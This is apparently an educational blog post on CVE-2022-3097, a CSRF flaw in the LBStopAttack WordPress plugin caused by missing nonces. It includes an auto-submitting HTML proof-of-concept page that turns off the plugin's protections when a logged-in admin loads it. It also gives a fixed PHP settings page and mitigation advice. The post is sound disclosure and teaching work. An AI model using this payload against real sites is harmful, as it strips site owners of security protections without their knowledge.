WordPress plugins bring tons of features to websites, but plugins with weak security can put your whole site at risk. In this post, we’ll look at CVE-2022-3097, a security flaw in the LBStopAttack WordPress plugin (through version 1.1.2) that exposes websites to a type of attack called CSRF (Cross-Site Request Forgery). Using this attack, a bad actor could quietly disable the plugin’s protections — and leave your site wide open.

What Is LBStopAttack?

LBStopAttack is a WordPress plugin meant to shield your site from brute-force and other common attacks. It’s supposed to give you an extra layer of defense, but ironically, a simple mistake in the plugin’s code created a new vulnerability.

The Security Flaw: Missing Nonces

In WordPress, a nonce is a security token that makes sure requests (like saving a plugin’s settings) actually come from a real logged-in user, not from an attacker. If a plugin doesn’t use nonces to check when someone updates its settings, it’s possible for an attacker to trick an admin into changing settings without their knowledge. This is a classic CSRF attack.

The LBStopAttack plugin, through version 1.1.2, doesn’t use nonces when saving its settings. That means, with just a little bit of social engineering, an attacker could sneak in and turn off all the plugin’s protections.

How Does the Attack Work?

Imagine you’re a WordPress site admin and you’re logged into your dashboard. An attacker sends you a link or tricks you into loading a web page they control. That page secretly submits a request to your WordPress site on your behalf — like changing the settings for LBStopAttack to turn it off!

The Exploit in Action

Suppose the plugin handles its settings via a request to /wp-admin/options-general.php?page=LBStopAttack with the necessary POST data. Here’s what a simple HTML attack snippet might look like:

<!DOCTYPE html>
<html>
  <body>
    <!-- This form would be submitted automatically to the target WordPress site -->
    <form action="https://YOUR-SITE.com/wp-admin/options-general.php?page=LBStopAttack" method="post" id="csrfForm">
      <!-- Malicious settings: disables protections -->
      <input type="hidden" name="ProtectEnable" value="">
      <input type="hidden" name="ProtectLogEnable" value="">
      <input type="hidden" name="ProtectBlockHtaccess" value="">
      <input type="hidden" name="submit" value="Save Settings">
    </form>
    <script>
      document.getElementById('csrfForm').submit();
    </script>
  </body>
</html>

If a logged-in admin loads this attack page, their browser will submit the request with their authentication cookies — and LBStopAttack will save the new settings, disabling itself. Notice there’s no nonce value required for the settings form.

Let’s say the plugin’s settings form looks like this:

<form method="post">
  <input type="checkbox" name="ProtectEnable" value="1" checked>
  <input type="checkbox" name="ProtectLogEnable" value="1" checked>
  <input type="checkbox" name="ProtectBlockHtaccess" value="1" checked>
  <input type="submit" name="submit" value="Save Settings">
</form>

But in the plugin’s code there is *no call to check_admin_referer()* and no custom nonce verification; the save handler looks like this:

if ( isset($_POST['submit']) ) {
  // Vulnerable! No nonce check!
  // Save the settings
}

A secure plugin would verify the nonce before saving anything:

if ( isset($_POST['submit']) && check_admin_referer('lbstopattack_save_settings') ) {
  // Safe to save settings
}
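Here is how the whole settings page can be wired up safely, as an added example that is not the plugin’s own code: the form emits a nonce with wp_nonce_field(), and the save handler verifies it with check_admin_referer() and also checks the user’s capability. The field names are the ones used above; the option name, the page callback name and the menu wiring are assumptions.

```php
<?php
// Added example, not the LBStopAttack plugin's own code: a minimal settings page
// that closes the CSRF hole with wp_nonce_field() + check_admin_referer() and a
// capability check. Field names come from the write-up; the option name
// 'lbstopattack_options' and the page callback name are assumptions.

defined( 'ABSPATH' ) || exit;

const LBSA_NONCE_ACTION = 'lbstopattack_save_settings';
const LBSA_FIELDS       = array( 'ProtectEnable', 'ProtectLogEnable', 'ProtectBlockHtaccess' );

add_action( 'admin_menu', function () {
    add_options_page( 'LBStopAttack', 'LBStopAttack', 'manage_options', 'LBStopAttack', 'lbsa_settings_page' );
} );

function lbsa_settings_page() {
    // Capability check: only users who may manage options can change protections.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You do not have permission to access this page.' ) );
    }

    if ( isset( $_POST['submit'] ) ) {
        // Verifies the _wpnonce field (and the referer); on failure it calls wp_die(),
        // so a forged cross-site POST like the one above never reaches update_option().
        check_admin_referer( LBSA_NONCE_ACTION );

        $options = array();
        foreach ( LBSA_FIELDS as $field ) {
            // Checkboxes are only sent when ticked; normalise to a strict 0/1.
            $options[ $field ] = ( isset( $_POST[ $field ] ) && '1' === $_POST[ $field ] ) ? 1 : 0;
        }
        update_option( 'lbstopattack_options', $options );
        echo '<div class="notice notice-success"><p>Settings saved.</p></div>';
    }

    $current = (array) get_option( 'lbstopattack_options', array_fill_keys( LBSA_FIELDS, 1 ) );
    echo '<form method="post">';
    wp_nonce_field( LBSA_NONCE_ACTION ); // emits the hidden _wpnonce + _wp_http_referer inputs
    foreach ( LBSA_FIELDS as $field ) {
        printf(
            '<label><input type="checkbox" name="%1$s" value="1" %2$s> %1$s</label><br>',
            esc_attr( $field ),
            checked( ! empty( $current[ $field ] ), true, false )
        );
    }
    submit_button( 'Save Settings' ); // renders <input type="submit" name="submit" ...>
    echo '</form>';
}
```

With this in place, the auto-submitting form from the attack page is rejected because it cannot supply a valid _wpnonce for the victim’s session.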

Why Does This Matter?

If an attacker disables your security plugin, they can follow up with further attacks—like brute-forcing your login page, defacing your website, or installing malware. You thought your plugin had you covered… but unless you’ve *updated*, you could be exposed.

How Can You Protect Yourself?

1. Update the plugin: This vulnerability was present in LBStopAttack versions through 1.1.2. Make sure you’re running the latest version from WordPress.org.
2. Use only reputable plugins: Always check for recent updates and active support.
3. Don’t browse random links while logged in as admin: Logging in as WordPress admin should be for admin work only.
4. Check your plugins for nonce checks: If you develop plugins or themes, always use nonce fields and verify them.

References

- CVE-2022-3097 Details (NVD)
- WPScan Vulnerability Database: LBStopAttack CSRF
- WordPress.org LBStopAttack Plugin

Summary

CVE-2022-3097 is a textbook example of why security basics like nonces matter in WordPress. Even a plugin meant to protect you can accidentally make you more vulnerable if it’s poorly coded. Always keep plugins updated, review security announcements, and remember: never trust input, always use nonces.


*Copyright © 2024. This write-up is original content for educational and security awareness purposes. Share to help your friends stay safe!*

Timeline

Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/26/2022 01:51:00 UTC